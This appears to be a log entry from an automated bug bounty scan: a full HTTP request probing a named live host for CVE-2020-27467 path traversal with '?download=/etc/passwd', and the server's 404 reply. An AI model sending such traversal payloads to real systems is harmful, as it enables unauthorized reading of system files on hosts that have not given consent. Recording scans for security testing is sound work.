[CVE-2020-27467] Dumped HTTP request for https://techsolutions.bitpanda.com/index.php?download=/etc/passwd


GET /index.php?download=/etc/passwd HTTP/1.1
Host: techsolutions.bitpanda.com
User-Agent: Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
X-Bug-Bounty: Bugcrowd-eno@bugcrowdninja.com
Accept-Encoding: gzip


[CVE-2020-27467] Dumped HTTP response https://techsolutions.bitpanda.com/index.php?download=/etc/passwd

HTTP/1.1 404 Not Found
Connection: close
Content-Length: 9
Cache-Control: max-age=30
Content-Type: text/plain
Date: Tue, 05 Aug 2025 12:53:23 GMT
Strict-Transport-Security: max-age=31536000
Via: 1.1 556fb8386f039ca8ee6a5b3f9ad1828c.cloudfront.net (CloudFront)
X-Amz-Cf-Id: H6BFpAZogL4AJkbnr24u7SWW7wXqlcKpVDTCmCBlWlZD1kDghfBtsg==
X-Amz-Cf-Pop: IAD55-P8
X-Amz-Id-2: qw6a3ODbiLH7Qg7HxfoOm4Y3+xgcx5ExHBHA06YqN1HNN+i8wa7FGpld5on0BdB6Hh9tlfywq9ITYeh/VQGO1ODZGpIy3eV1NbWV9KNhdbo=
X-Amz-Request-Id: 41Z8TNDYXN3B8GB8
X-Cache: Error from cloudfront

Not Found
